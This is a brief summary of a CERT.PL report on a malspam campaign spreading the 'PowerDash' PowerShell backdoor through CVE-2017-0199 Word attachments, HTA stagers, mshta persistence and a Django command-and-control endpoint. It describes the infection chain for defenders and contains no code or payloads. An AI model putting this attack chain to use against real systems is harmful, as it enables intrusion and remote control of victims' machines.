Malspam campaign delivering PowerDash – a tiny PowerShell backdoor

CERT.PL observed a malspam campaign distributing a newly identified PowerShell malware family called "PowerDash" that leverages CVE-2017-0199 in malicious Word attachments to deliver HTA-based stagers; the stagers install persistence via mshta.exe, fetch an obfuscated PowerShell payload that enumerates host details and registers with a Python/Django C2 at /dash/post_data/, and supports remote command execution. The report contains analysis of the lure, HTA/stager mechanics, deobfuscation steps, C2 internals, and a table of IoCs (IPs, URLs, and SHA256 hashes) for detection and monitoring.